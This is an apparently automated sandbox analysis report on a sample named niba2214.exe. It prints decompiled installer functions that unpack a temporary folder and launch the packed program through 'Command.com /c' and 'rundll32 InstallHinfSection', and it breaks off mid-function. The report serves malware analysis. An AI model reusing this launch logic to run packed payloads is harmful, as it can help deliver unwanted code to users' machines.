Opcode Fuzzy Hash: 88ef6cbd1883a18f57c7f400eab25a582aaf2aa2fe493c2989759d0c850b908f
Instruction Fuzzy Hash: 8CF0DA70D487018FE6586B34AD0E6083B61B745321B10C619E45EA62E2CF3E8581CB16

Uniqueness

Uniqueness Score: -1.00%

Analysis Process: niba2214.exePID: 5268, Parent PID: 2968COMMON

Execution Graph

Execution Coverage:	26.9%
Dynamic/Decrypted Code Coverage:	0%
Signature Coverage:	0%
Total number of Nodes:	969
Total number of Limit Nodes:	42

Callgraph

Executed
Not Executed
Opacity -> Relevance
Disassembly available

Executed Functions

Function 01253BA2 Relevance: 40.6, APIs: 11, Strings: 12, Instructions: 308
libraryloaderCOMMONCrypto

Download Yara Rule

Control-flow Graph

Executed
Not Executed

C-Code - Quality: 82%

			E01253BA2() {
				signed int _v8;
				signed int _v12;
				char _v276;
				char _v280;
				short _v300;
				intOrPtr _v304;
				void _v348;
				char _v352;
				intOrPtr _v356;
				signed int _v360;
				short _v364;
				char* _v368;
				intOrPtr _v372;
				void* _v376;
				intOrPtr _v380;
				char _v384;
				signed int _v388;
				intOrPtr _v392;
				signed int _v396;
				signed int _v400;
				signed int _v404;
				void* _v408;
				void* _v424;
				void* __ebx;
				void* __edi;
				void* __esi;
				signed int _t69;
				signed int _t76;
				void* _t77;
				signed int _t79;
				short _t96;
				signed int _t97;
				intOrPtr _t98;
				signed int _t101;
				signed int _t104;
				signed int _t108;
				int _t112;
				void* _t115;
				signed char _t118;
				void* _t125;
				signed int _t127;
				void* _t128;
				struct HINSTANCE__* _t129;
				void* _t130;
				short _t137;
				char* _t140;
				signed char _t144;
				signed char _t145;
				signed int _t149;
				void* _t150;
				void* _t151;
				signed int _t153;
				void* _t155;
				void* _t156;
				signed int _t157;
				signed int _t162;
				signed int _t164;
				void* _t165;

				_t164 = (_t162 & 0xfffffff8) - 0x194;
				_t69 =  *0x1258004; // 0x958f311c
				_v8 = _t69 ^ _t164;
				_t153 = 0;
				 *0x1259124 =  *0x1259124 & 0;
				_t149 = 0;
				_v388 = 0;
				_v384 = 0;
				_t165 =  *0x1258a28 - _t153; // 0x0
				if(_t165 != 0) {
					L3:
					_t127 = 0;
					_v392 = 0;
					while(1) {
						_v400 = _v400 & 0x00000000;
						memset( &_v348, 0, 0x44);
						_t164 = _t164 + 0xc;
						_v348 = 0x44;
						if( *0x1258c42 != 0) {
							goto L26;
						}
						_t146 =  &_v396;
						_t115 = E0125468F("SHOWWINDOW",  &_v396, 4);
						if(_t115 == 0 || _t115 > 4) {
							L25:
							_t146 = 0x4b1;
							E012544B9(0, 0x4b1, 0, 0, 0x10, 0);
							 *0x1259124 = 0x80070714;
							goto L62;
						} else {
							if(_v396 != 1) {
								__eflags = _v396 - 2;
								if(_v396 != 2) {
									_t137 = 3;
									__eflags = _v396 - _t137;
									if(_v396 == _t137) {
										_v304 = 1;
										_v300 = _t137;
									}
									goto L14;
								}
								_push(6);
								_v304 = 1;
								_pop(0);
								goto L11;
							} else {
								_v304 = 1;
								L11:
								_v300 = 0;
								L14:
								if(_t127 != 0) {
									L27:
									_t155 = 1;
									__eflags = _t127 - 1;
									if(_t127 != 1) {
										L31:
										_t132 =  &_v280;
										_t76 = E01251AE8( &_v280,  &_v408,  &_v404); // executed
										__eflags = _t76;
										if(_t76 == 0) {
											L62:
											_t77 = 0;
											L63:
											_pop(_t150);
											_pop(_t156);
											_pop(_t128);
											return E01256CE0(_t77, _t128, _v12 ^ _t164, _t146, _t150, _t156);
										}
										_t157 = _v404;
										__eflags = _t149;
										if(_t149 != 0) {
											L37:
											__eflags = _t157;
											if(_t157 == 0) {
												L57:
												_t151 = _v408;
												_t146 =  &_v352;
												_t130 = _t151; // executed
												_t79 = E01253FEF(_t130,  &_v352); // executed
												__eflags = _t79;
												if(_t79 == 0) {
													L61:
													LocalFree(_t151);
													goto L62;
												}
												L58:
												LocalFree(_t151);
												_t127 = _t127 + 1;
												_v396 = _t127;
												__eflags = _t127 - 2;
												if(_t127 >= 2) {
													_t155 = 1;
													__eflags = 1;
													L69:
													__eflags =  *0x1258580;
													if( *0x1258580 != 0) {
														E01252267();
													}
													_t77 = _t155;
													goto L63;
												}
												_t153 = _v392;
												_t149 = _v388;
												continue;
											}
											L38:
											__eflags =  *0x1258180;
											if( *0x1258180 == 0) {
												_t146 = 0x4c7;
												E012544B9(0, 0x4c7, 0, 0, 0x10, 0);
												LocalFree(_v424);
												 *0x1259124 = 0x8007042b;
												goto L62;
											}
											__eflags = _t157;
											if(_t157 == 0) {
												goto L57;
											}
											__eflags =  *0x1259a34 & 0x00000004;
											if(__eflags == 0) {
												goto L57;
											}
											_t129 = E01256495(_t127, _t132, _t157, __eflags);
											__eflags = _t129;
											if(_t129 == 0) {
												_t146 = 0x4c8;
												E012544B9(0, 0x4c8, "advpack.dll", 0, 0x10, 0);
												L65:
												LocalFree(_v408);
												 *0x1259124 = E01256285();
												goto L62;
											}
											_t146 = GetProcAddress(_t129, "DoInfInstall");
											_v404 = _t146;
											__eflags = _t146;
											if(_t146 == 0) {
												_t146 = 0x4c9;
												__eflags = 0;
												E012544B9(0, 0x4c9, "DoInfInstall", 0, 0x10, 0);
												FreeLibrary(_t129);
												goto L65;
											}
											__eflags =  *0x1258a30;
											_t151 = _v408;
											_v384 = 0;
											_v368 =  &_v280;
											_t96 =  *0x1259a40; // 0x3
											_v364 = _t96;
											_t97 =  *0x1258a38 & 0x0000ffff;
											_v380 = 0x1259154;
											_v376 = _t151;
											_v372 = 0x12591e4;
											_v360 = _t97;
											if( *0x1258a30 != 0) {
												_t97 = _t97 | 0x00010000;
												__eflags = _t97;
												_v360 = _t97;
											}
											_t144 =  *0x1259a34; // 0x1
											__eflags = _t144 & 0x00000008;
											if((_t144 & 0x00000008) != 0) {
												_t97 = _t97 | 0x00020000;
												__eflags = _t97;
												_v360 = _t97;
											}
											__eflags = _t144 & 0x00000010;
											if((_t144 & 0x00000010) != 0) {
												_t97 = _t97 | 0x00040000;
												__eflags = _t97;
												_v360 = _t97;
											}
											_t145 =  *0x1258d48; // 0x0
											__eflags = _t145 & 0x00000040;
											if((_t145 & 0x00000040) != 0) {
												_t97 = _t97 | 0x00080000;
												__eflags = _t97;
												_v360 = _t97;
											}
											__eflags = _t145;
											if(_t145 < 0) {
												_t104 = _t97 | 0x00100000;
												__eflags = _t104;
												_v360 = _t104;
											}
											_t98 =  *0x1259a38; // 0x0
											_v356 = _t98;
											_t130 = _t146;
											 *0x125a288( &_v384);
											_t101 = _v404();
											__eflags = _t164 - _t164;
											if(_t164 != _t164) {
												_t130 = 4;
												asm("int 0x29");
											}
											 *0x1259124 = _t101;
											_push(_t129);
											__eflags = _t101;
											if(_t101 < 0) {
												FreeLibrary();
												goto L61;
											} else {
												FreeLibrary();
												_t127 = _v400;
												goto L58;
											}
										}
										__eflags =  *0x1259a40 - 1; // 0x3
										if(__eflags == 0) {
											goto L37;
										}
										__eflags =  *0x1258a20;
										if( *0x1258a20 == 0) {
											goto L37;
										}
										__eflags = _t157;
										if(_t157 != 0) {
											goto L38;
										}
										_v388 = 1;
										E0125202A(_t146); // executed
										goto L37;
									}
									_t146 =  &_v280;
									_t108 = E0125468F("POSTRUNPROGRAM",  &_v280, 0x104);
									__eflags = _t108;
									if(_t108 == 0) {
										goto L25;
									}
									__eflags =  *0x1258c42;
									if( *0x1258c42 != 0) {
										goto L69;
									}
									_t112 = CompareStringA(0x7f, 1,  &_v280, 0xffffffff, "<None>", 0xffffffff);
									__eflags = _t112 == 0;
									if(_t112 == 0) {
										goto L69;
									}
									goto L31;
								}
								_t118 =  *0x1258a38; // 0x0
								if(_t118 == 0) {
									L23:
									if(_t153 != 0) {
										goto L31;
									}
									_t146 =  &_v276;
									if(E0125468F("RUNPROGRAM",  &_v276, 0x104) != 0) {
										goto L27;
									}
									goto L25;
								}
								if((_t118 & 0x00000001) == 0) {
									__eflags = _t118 & 0x00000002;
									if((_t118 & 0x00000002) == 0) {
										goto L62;
									}
									_t140 = "USRQCMD";
									L20:
									_t146 =  &_v276;
									if(E0125468F(_t140,  &_v276, 0x104) == 0) {
										goto L25;
									}
									if(CompareStringA(0x7f, 1,  &_v276, 0xffffffff, "<None>", 0xffffffff) - 2 != 0xfffffffe) {
										_t153 = 1;
										_v388 = 1;
									}
									goto L23;
								}
								_t140 = "ADMQCMD";
								goto L20;
							}
						}
						L26:
						_push(_t130);
						_t146 = 0x104;
						E01251781( &_v276, 0x104, _t130, 0x1258c42);
						goto L27;
					}
				}
				_t130 = "REBOOT";
				_t125 = E0125468F(_t130, 0x1259a2c, 4);
				if(_t125 == 0 || _t125 > 4) {
					goto L25;
				} else {
					goto L3;
				}
			}

0x01253baa
0x01253bb0
0x01253bb7
0x01253bc0
0x01253bc2
0x01253bc9
0x01253bcb
0x01253bcf
0x01253bd3
0x01253bd9
0x01253bfd
0x01253bfd
0x01253bff
0x01253c03
0x01253c03
0x01253c11
0x01253c16
0x01253c19
0x01253c28
0x00000000
0x00000000
0x01253c30
0x01253c39
0x01253c40
0x01253d13
0x01253d15
0x01253d21
0x01253d26
0x00000000
0x01253c4f
0x01253c56
0x01253c60
0x01253c65
0x01253c77
0x01253c78
0x01253c7c
0x01253c7e
0x01253c82
0x01253c82
0x00000000
0x01253c7c
0x01253c67
0x01253c69
0x01253c6d
0x00000000
0x01253c58
0x01253c58
0x01253c6e
0x01253c6e
0x01253c87
0x01253c89
0x01253d4d
0x01253d4f
0x01253d50
0x01253d52
0x01253d9e
0x01253da8
0x01253daf
0x01253db4
0x01253db6
0x01253f4d
0x01253f4d
0x01253f4f
0x01253f56
0x01253f57
0x01253f58
0x01253f63
0x01253f63
0x01253dbc
0x01253dc0
0x01253dc2
0x01253de6
0x01253de6
0x01253de8
0x01253f0b
0x01253f0b
0x01253f0f
0x01253f13
0x01253f15
0x01253f1a
0x01253f1c
0x01253f46
0x01253f47
0x00000000
0x01253f47
0x01253f1e
0x01253f1f
0x01253f25
0x01253f26
0x01253f2a
0x01253f2d
0x01253fd9
0x01253fd9
0x01253fda
0x01253fda
0x01253fe1
0x01253fe3
0x01253fe3
0x01253fe8
0x00000000
0x01253fe8
0x01253f33
0x01253f37
0x00000000
0x01253f37
0x01253dee
0x01253dee
0x01253df5
0x01253fad
0x01253fb9
0x01253fc2
0x01253fc8
0x00000000
0x01253fc8
0x01253dfb
0x01253dfd
0x00000000
0x00000000
0x01253e03
0x01253e0a
0x00000000
0x00000000
0x01253e15
0x01253e17
0x01253e19
0x01253f94
0x01253fa4
0x01253f7c
0x01253f80
0x01253f8b
0x00000000
0x01253f8b
0x01253e2c
0x01253e30
0x01253e34
0x01253e36
0x01253f69
0x01253f6e
0x01253f70
0x01253f76
0x00000000
0x01253f76
0x01253e3c
0x01253e43
0x01253e47
0x01253e52
0x01253e56
0x01253e5c
0x01253e61
0x01253e68
0x01253e70
0x01253e74
0x01253e7c
0x01253e80
0x01253e82
0x01253e82
0x01253e87
0x01253e87
0x01253e8b
0x01253e91
0x01253e94
0x01253e96
0x01253e96
0x01253e9b
0x01253e9b
0x01253e9f
0x01253ea2
0x01253ea4
0x01253ea4
0x01253ea9
0x01253ea9
0x01253ead
0x01253eb3
0x01253eb6
0x01253eb8
0x01253eb8
0x01253ebd
0x01253ebd
0x01253ec1
0x01253ec3
0x01253ec5
0x01253ec5
0x01253eca
0x01253eca
0x01253ece
0x01253ed5
0x01253ed9
0x01253ee0
0x01253ee6
0x01253eea
0x01253eec
0x01253eee
0x01253ef3
0x01253ef3
0x01253ef5
0x01253efa
0x01253efb
0x01253efd
0x01253f40
0x00000000
0x01253eff
0x01253eff
0x01253f05
0x00000000
0x01253f05
0x01253efd
0x01253dc7
0x01253dce
0x00000000
0x00000000
0x01253dd0
0x01253dd7
0x00000000
0x00000000
0x01253dd9
0x01253ddb
0x00000000
0x00000000
0x01253ddd
0x01253de1
0x00000000
0x01253de1
0x01253d59
0x01253d65
0x01253d6a
0x01253d6c
0x00000000
0x00000000
0x01253d6e
0x01253d75
0x00000000
0x00000000
0x01253d8f
0x01253d96
0x01253d98
0x00000000
0x00000000
0x00000000
0x01253d98
0x01253c8f
0x01253c98
0x01253cf1
0x01253cf3
0x00000000
0x00000000
0x01253cfe
0x01253d11
0x00000000
0x00000000
0x00000000
0x01253d11
0x01253c9c
0x01253ca5
0x01253ca7
0x00000000
0x00000000
0x01253cad
0x01253cb2
0x01253cb7
0x01253cc5
0x00000000
0x00000000
0x01253ce8
0x01253cec
0x01253ced
0x01253ced
0x00000000
0x01253ce8
0x01253c9e
0x00000000
0x01253c9e
0x01253c56
0x01253d35
0x01253d35
0x01253d3c
0x01253d48
0x00000000
0x01253d48
0x01253c03
0x01253be2
0x01253be7
0x01253bee
0x00000000
0x00000000
0x00000000
0x00000000

APIs

memset.MSVCRT ref: 01253C11
CompareStringA.KERNEL32(0000007F,00000001,?,000000FF,<None>,000000FF,00000104,00000004), ref: 01253CDC

Part of subcall function 0125468F: FindResourceA.KERNEL32(00000000,TITLE,0000000A), ref: 012546A0
Part of subcall function 0125468F: SizeofResource.KERNEL32(00000000,00000000,?,01252D1A,0000007F,?,?,?,?,?,?,?,00000002,00000000), ref: 012546A9
Part of subcall function 0125468F: FindResourceA.KERNEL32(00000000,TITLE,0000000A), ref: 012546C3
Part of subcall function 0125468F: LoadResource.KERNEL32(00000000,00000000,?,01252D1A,0000007F,?,?,?,?,?,?,?,00000002,00000000), ref: 012546CC
Part of subcall function 0125468F: LockResource.KERNEL32(00000000,?,01252D1A,0000007F,?,?,?,?,?,?,?,00000002,00000000), ref: 012546D3
Part of subcall function 0125468F: memcpy_s.MSVCRT ref: 012546E5
Part of subcall function 0125468F: FreeResource.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,00000002,00000000), ref: 012546EF

CompareStringA.KERNEL32(0000007F,00000001,?,000000FF,<None>,000000FF,00000104,?,01258C42), ref: 01253D8F
GetProcAddress.KERNEL32(00000000,DoInfInstall), ref: 01253E26
FreeLibrary.KERNEL32(00000000,?,01258C42), ref: 01253EFF
LocalFree.KERNEL32(?,?,?,?,01258C42), ref: 01253F1F
FreeLibrary.KERNEL32(00000000,?,01258C42), ref: 01253F40
LocalFree.KERNEL32(?,?,?,?,01258C42), ref: 01253F47
FreeLibrary.KERNEL32(00000000,DoInfInstall,00000000,00000010,00000000,?,01258C42), ref: 01253F76
LocalFree.KERNEL32(?,advpack.dll,00000000,00000010,00000000,?,?,?,01258C42), ref: 01253F80
LocalFree.KERNEL32(?,00000000,00000000,00000010,00000000,?,?,?,01258C42), ref: 01253FC2

Strings

POSTRUNPROGRAM, xrefs: 01253D60
advpack.dll, xrefs: 01253F9D
ADMQCMD, xrefs: 01253C9E
siga30, xrefs: 01253E68
C:\Users\user\AppData\Local\Temp\IXP002.TMP\, xrefs: 01253E74
D, xrefs: 01253C19
RUNPROGRAM, xrefs: 01253D05
DoInfInstall, xrefs: 01253E1F, 01253E24, 01253F68
<None>, xrefs: 01253CC9, 01253D7D
SHOWWINDOW, xrefs: 01253C34
USRQCMD, xrefs: 01253CAD
REBOOT, xrefs: 01253BE2

Memory Dump Source

Source File: 00000002.00000002.308648516.0000000001251000.00000020.00000001.01000000.00000005.sdmp, Offset: 01250000, based on PE: true

Associated: 00000002.00000002.308642983.0000000001250000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.308656619.0000000001258000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.308664488.000000000125A000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.308664488.000000000125C000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_1250000_niba2214.jbxd

Similarity

API ID: Free$Resource$Local$Library$CompareFindString$AddressLoadLockProcSizeofmemcpy_smemset
String ID: <None>$ADMQCMD$C:\Users\user\AppData\Local\Temp\IXP002.TMP\$D$DoInfInstall$POSTRUNPROGRAM$REBOOT$RUNPROGRAM$SHOWWINDOW$USRQCMD$advpack.dll$siga30
API String ID: 1032054927-2353267805
Opcode ID: bf1dc00ae00cdbd4be4648c57fffad28356643be355c3abb67c5d2b906250e5a
Instruction ID: e1a7d1e1c57c4ce747fd7484982ba25b7ea11841d29828e39d81f767b066cb27
Opcode Fuzzy Hash: bf1dc00ae00cdbd4be4648c57fffad28356643be355c3abb67c5d2b906250e5a
Instruction Fuzzy Hash: EEB1B0705343129BEBB0DF2998C9B6A7AE4FB84794F00592DEF86D7184E770C844CB52

Uniqueness

Uniqueness Score: -1.00%

Function 01251AE8 Relevance: 38.8, APIs: 10, Strings: 12, Instructions: 291
memoryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

C-Code - Quality: 82%

			E01251AE8(long __ecx, CHAR** _a4, int* _a8) {
				signed int _v8;
				char _v268;
				char _v527;
				char _v528;
				char _v1552;
				CHAR* _v1556;
				int* _v1560;
				CHAR** _v1564;
				void* __ebx;
				void* __edi;
				void* __esi;
				signed int _t48;
				CHAR* _t53;
				CHAR* _t54;
				char* _t57;
				char* _t58;
				CHAR* _t60;
				void* _t62;
				signed char _t65;
				intOrPtr _t76;
				intOrPtr _t77;
				unsigned int _t85;
				CHAR* _t90;
				CHAR* _t92;
				char _t105;
				char _t106;
				CHAR** _t111;
				CHAR* _t115;
				intOrPtr* _t125;
				void* _t126;
				CHAR* _t132;
				CHAR* _t135;
				void* _t138;
				void* _t139;
				void* _t145;
				intOrPtr* _t146;
				char* _t148;
				CHAR* _t151;
				void* _t152;
				CHAR* _t155;
				CHAR* _t156;
				void* _t157;
				signed int _t158;

				_t48 =  *0x1258004; // 0x958f311c
				_v8 = _t48 ^ _t158;
				_t108 = __ecx;
				_v1564 = _a4;
				_v1560 = _a8;
				E01251680( &_v528, 0x104, __ecx);
				if(_v528 != 0x22) {
					_t135 = " ";
					_t53 =  &_v528;
				} else {
					_t135 = "\"";
					_t53 =  &_v527;
				}
				_t111 =  &_v1556;
				_v1556 = _t53;
				_t54 = E01251A84(_t111, _t135);
				_t156 = _v1556;
				_t151 = _t54;
				if(_t156 == 0) {
					L12:
					_push(_t111);
					E01251781( &_v268, 0x104, _t111, "C:\Users\engineer\AppData\Local\Temp\IXP002.TMP\");
					E0125658A( &_v268, 0x104, _t156);
					goto L13;
				} else {
					_t132 = _t156;
					_t148 =  &(_t132[1]);
					do {
						_t105 =  *_t132;
						_t132 =  &(_t132[1]);
					} while (_t105 != 0);
					_t111 = _t132 - _t148;
					if(_t111 < 3) {
						goto L12;
					}
					_t106 = _t156[1];
					if(_t106 != 0x3a || _t156[2] != 0x5c) {
						if( *_t156 != 0x5c || _t106 != 0x5c) {
							goto L12;
						} else {
							goto L11;
						}
					} else {
						L11:
						E01251680( &_v268, 0x104, _t156);
						L13:
						_t138 = 0x2e;
						_t57 = E012566C8(_t156, _t138);
						if(_t57 == 0 || CompareStringA(0x7f, 1, _t57, 0xffffffff, ".INF", 0xffffffff) != 0) {
							_t139 = 0x2e;
							_t115 = _t156;
							_t58 = E012566C8(_t115, _t139);
							if(_t58 == 0 || CompareStringA(0x7f, 1, _t58, 0xffffffff, ".BAT", 0xffffffff) != 0) {
								_t156 = LocalAlloc(0x40, 0x400);
								if(_t156 == 0) {
									goto L43;
								}
								_t65 = GetFileAttributesA( &_v268); // executed
								if(_t65 == 0xffffffff || (_t65 & 0x00000010) != 0) {
									E01251680( &_v1552, 0x400, _t108);
								} else {
									_push(_t115);
									_t108 = 0x400;
									E01251781( &_v1552, 0x400, _t115,  &_v268);
									if(_t151 != 0 &&  *_t151 != 0) {
										E012516B3( &_v1552, 0x400, " ");
										E012516B3( &_v1552, 0x400, _t151);
									}
								}
								_t140 = _t156;
								 *_t156 = 0;
								E01252AAC( &_v1552, _t156, _t156);
								goto L53;
							} else {
								_t108 = "Command.com /c %s";
								_t125 = "Command.com /c %s";
								_t145 = _t125 + 1;
								do {
									_t76 =  *_t125;
									_t125 = _t125 + 1;
								} while (_t76 != 0);
								_t126 = _t125 - _t145;
								_t146 =  &_v268;
								_t157 = _t146 + 1;
								do {
									_t77 =  *_t146;
									_t146 = _t146 + 1;
								} while (_t77 != 0);
								_t140 = _t146 - _t157;
								_t154 = _t126 + 8 + _t146 - _t157;
								_t156 = LocalAlloc(0x40, _t126 + 8 + _t146 - _t157);
								if(_t156 != 0) {
									E0125171E(_t156, _t154, "Command.com /c %s",  &_v268);
									goto L53;
								}
								goto L43;
							}
						} else {
							_t85 = GetFileAttributesA( &_v268);
							if(_t85 == 0xffffffff || ( !(_t85 >> 4) & 0x00000001) == 0) {
								_t140 = 0x525;
								_push(0);
								_push(0x10);
								_push(0);
								_t60 =  &_v268;
								goto L35;
							} else {
								_t140 = "[";
								_v1556 = _t151;
								_t90 = E01251A84( &_v1556, "[");
								if(_t90 != 0) {
									if( *_t90 != 0) {
										_v1556 = _t90;
									}
									_t140 = "]";
									E01251A84( &_v1556, "]");
								}
								_t156 = LocalAlloc(0x40, 0x200);
								if(_t156 == 0) {
									L43:
									_t60 = 0;
									_t140 = 0x4b5;
									_push(0);
									_push(0x10);
									_push(0);
									L35:
									_push(_t60);
									E012544B9(0, _t140);
									_t62 = 0;
									goto L54;
								} else {
									_t155 = _v1556;
									_t92 = _t155;
									if( *_t155 == 0) {
										_t92 = "DefaultInstall";
									}
									 *0x1259120 = GetPrivateProfileIntA(_t92, "Reboot", 0,  &_v268);
									 *_v1560 = 1;
									if(GetPrivateProfileStringA("Version", "AdvancedINF", 0x1251140, _t156, 8,  &_v268) == 0) {
										 *0x1259a34 =  *0x1259a34 & 0xfffffffb;
										if( *0x1259a40 != 0) {
											_t108 = "setupapi.dll";
										} else {
											_t108 = "setupx.dll";
											GetShortPathNameA( &_v268,  &_v268, 0x104);
										}
										if( *_t155 == 0) {
											_t155 = "DefaultInstall";
										}
										_push( &_v268);
										_push(_t155);
										E0125171E(_t156, 0x200, "rundll32.exe %s,InstallHinfSection %s 128 %s", _t108);
									} else {
										 *0x1259a34 =  *0x1259a34 | 0x00000004;
										if( *_t155 == 0) {
											_t155 = "DefaultInstall";
										}
										E01251680(_t108, 0x104, _t155);
										_t140 = 0x200;
										E01251680(_t156, 0x200,  &_v268);
									}
									L53:
									_t62 = 1;
									 *_v1564 = _t156;
									L54:
									_pop(_t152);
									return E01256CE0(_t62, _t108, _v8 ^ _t158, _t140, _t152, _t156);
								}
							}
						}
					}
				}
			}

0x01251af3
0x01251afa
0x01251b07
0x01251b09
0x01251b1a
0x01251b20
0x01251b2c
0x01251b3b
0x01251b40
0x01251b2e
0x01251b2e
0x01251b33
0x01251b33
0x01251b46
0x01251b4c
0x01251b52
0x01251b57
0x01251b5d
0x01251b61
0x01251b9f
0x01251b9f
0x01251bb1
0x01251bc2
0x00000000
0x01251b63
0x01251b63
0x01251b65
0x01251b68
0x01251b68
0x01251b6a
0x01251b6b
0x01251b6f
0x01251b74
0x00000000
0x00000000
0x01251b76
0x01251b7b
0x01251b86
0x00000000
0x00000000
0x00000000
0x00000000
0x01251b8c
0x01251b8c
0x01251b98
0x01251bc7
0x01251bc9
0x01251bcc
0x01251bd3
0x01251d75
0x01251d76
0x01251d78
0x01251d7f
0x01251e05
0x01251e09
0x00000000
0x00000000
0x01251e12
0x01251e1b
0x01251e73
0x01251e21
0x01251e21
0x01251e28
0x01251e37
0x01251e3e
0x01251e52
0x01251e60
0x01251e60
0x01251e3e
0x01251e79
0x01251e7b
0x01251e84
0x00000000
0x01251d9b
0x01251d9b
0x01251da0
0x01251da2
0x01251da5
0x01251da5
0x01251da7
0x01251da8
0x01251dac
0x01251dae
0x01251db4
0x01251db7
0x01251db7
0x01251db9
0x01251dba
0x01251dbe
0x01251dc3
0x01251dce
0x01251dd2
0x01251deb
0x00000000
0x01251df0
0x00000000
0x01251dd2
0x01251bf7
0x01251bfe
0x01251c07
0x01251d55
0x01251d5a
0x01251d5b
0x01251d5d
0x01251d5e
0x00000000
0x01251c1b
0x01251c1b
0x01251c20
0x01251c2c
0x01251c33
0x01251c38
0x01251c3a
0x01251c3a
0x01251c40
0x01251c4b
0x01251c4b
0x01251c5d
0x01251c61
0x01251dd4
0x01251dd4
0x01251dd6
0x01251ddb
0x01251ddc
0x01251dde
0x01251d64
0x01251d64
0x01251d67
0x01251d6c
0x00000000
0x01251c67
0x01251c67
0x01251c6d
0x01251c72
0x01251c74
0x01251c74
0x01251c8e
0x01251c99
0x01251cc0
0x01251cf8
0x01251d07
0x01251d23
0x01251d09
0x01251d14
0x01251d1b
0x01251d1b
0x01251d2b
0x01251d2d
0x01251d2d
0x01251d38
0x01251d39
0x01251d46
0x01251cc2
0x01251cc2
0x01251ccc
0x01251cce
0x01251cce
0x01251cdb
0x01251ce6
0x01251cee
0x01251cee
0x01251e89
0x01251e91
0x01251e92
0x01251e94
0x01251e97
0x01251ea4
0x01251ea4
0x01251c61
0x01251c07
0x01251bd3
0x01251b7b

APIs

CompareStringA.KERNEL32(0000007F,00000001,00000000,000000FF,.INF,000000FF,?,?,C:\Users\user\AppData\Local\Temp\IXP002.TMP\,?,?,00000000,00000001,00000000), ref: 01251BE7
GetFileAttributesA.KERNEL32(?,?,C:\Users\user\AppData\Local\Temp\IXP002.TMP\,?,?,00000000,00000001,00000000), ref: 01251BFE
LocalAlloc.KERNEL32(00000040,00000200,?,C:\Users\user\AppData\Local\Temp\IXP002.TMP\,?,?,00000000,00000001,00000000), ref: 01251C57
GetPrivateProfileIntA.KERNEL32 ref: 01251C88
GetPrivateProfileStringA.KERNEL32(Version,AdvancedINF,01251140,00000000,00000008,?), ref: 01251CB8
GetShortPathNameA.KERNEL32 ref: 01251D1B

Part of subcall function 012544B9: LoadStringA.USER32(000004B1,?,00000200,00000000), ref: 01254518
Part of subcall function 012544B9: MessageBoxA.USER32(?,?,siga30,00010010), ref: 01254554

Strings

.INF, xrefs: 01251BDB
Command.com /c %s, xrefs: 01251D9B, 01251DE8
setupapi.dll, xrefs: 01251D23, 01251D3A
rundll32.exe %s,InstallHinfSection %s 128 %s, xrefs: 01251D3B
DefaultInstall, xrefs: 01251C74, 01251C87, 01251CCE, 01251CD3, 01251D2D, 01251D39
Reboot, xrefs: 01251C82
Version, xrefs: 01251CB3
", xrefs: 01251B25
C:\Users\user\AppData\Local\Temp\IXP002.TMP\, xrefs: 01251BA0
AdvancedINF, xrefs: 01251CAE
.BAT, xrefs: 01251D83
setupx.dll, xrefs: 01251D14

Memory Dump Source

Source File: 00000002.00000002.308648516.0000000001251000.00000020.00000001.01000000.00000005.sdmp, Offset: 01250000, based on PE: true

Associated: 00000002.00000002.308642983.0000000001250000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.308656619.0000000001258000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.308664488.000000000125A000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.308664488.000000000125C000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_1250000_niba2214.jbxd

Similarity

API ID: String$PrivateProfile$AllocAttributesCompareFileLoadLocalMessageNamePathShort
String ID: "$.BAT$.INF$AdvancedINF$C:\Users\user\AppData\Local\Temp\IXP002.TMP\$Command.com /c %s$DefaultInstall$Reboot$Version$rundll32.exe %s,InstallHinfSection %s 128 %s$setupapi.dll$setupx.dll
API String ID: 383838535-55413852
Opcode ID: 33c96f1368ecc0b226d575860c8511407195de8154edb84c5a1fb0bdf2305481
Instruction ID: c44c106c7897bf4d3095a30e0da9c1fc18ae6ca56b2fe268ade125809e42bfe6
Opcode Fuzzy Hash: 33c96f1368ecc0b226d575860c8511407195de8154edb84c5a1fb0bdf2305481
Instruction Fuzzy Hash: F0A15B70A202166BEFA09B28DCC4FFA77699F51310F144298EE55A32C0DBB09DA5CB50

Uniqueness

Uniqueness Score: -1.00%

Function 01252F1D Relevance: 15.9, APIs: 6, Strings: 3, Instructions: 120
libraryfileloaderCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

C-Code - Quality: 82%

			E01252F1D(void* __ecx, int __edx) {
				signed int _v8;
				char _v272;
				_Unknown_base(*)()* _v276;
				void* __ebx;
				void* __edi;
				void* __esi;
				signed int _t9;
				void* _t11;
				struct HWND__* _t12;
				void* _t14;
				int _t21;
				signed int _t22;
				signed int _t25;
				intOrPtr* _t26;
				signed int _t27;
				void* _t30;
				_Unknown_base(*)()* _t31;
				void* _t34;
				struct HINSTANCE__* _t36;
				intOrPtr _t41;
				intOrPtr* _t44;
				signed int _t46;
				int _t47;
				void* _t58;
				void* _t59;

				_t43 = __edx;
				_t9 =  *0x1258004; // 0x958f311c
				_v8 = _t9 ^ _t46;
				if( *0x1258a38 != 0) {
					L5:
					_t11 = E01255164(_t52);
					_t53 = _t11;
					if(_t11 == 0) {
						L16:
						_t12 = 0;
						L17:
						return E01256CE0(_t12, _t36, _v8 ^ _t46, _t43, _t44, _t45);
					}
					_t14 = E012555A0(_t53); // executed
					if(_t14 == 0) {
						goto L16;
					} else {
						_t45 = 0x105;
						GetSystemDirectoryA( &_v272, 0x105);
						_t43 = 0x105;
						_t40 =  &_v272;
						E0125658A( &_v272, 0x105, "advapi32.dll");
						_t36 = LoadLibraryA( &_v272);
						_t44 = 0;
						if(_t36 != 0) {
							_t31 = GetProcAddress(_t36, "DecryptFileA");
							_v276 = _t31;
							if(_t31 != 0) {
								_t45 = _t47;
								_t40 = _t31;
								 *0x125a288("C:\Users\engineer\AppData\Local\Temp\IXP002.TMP\", 0); // executed
								_v276();
								if(_t47 != _t47) {
									_t40 = 4;
									asm("int 0x29");
								}
							}
						}
						FreeLibrary(_t36);
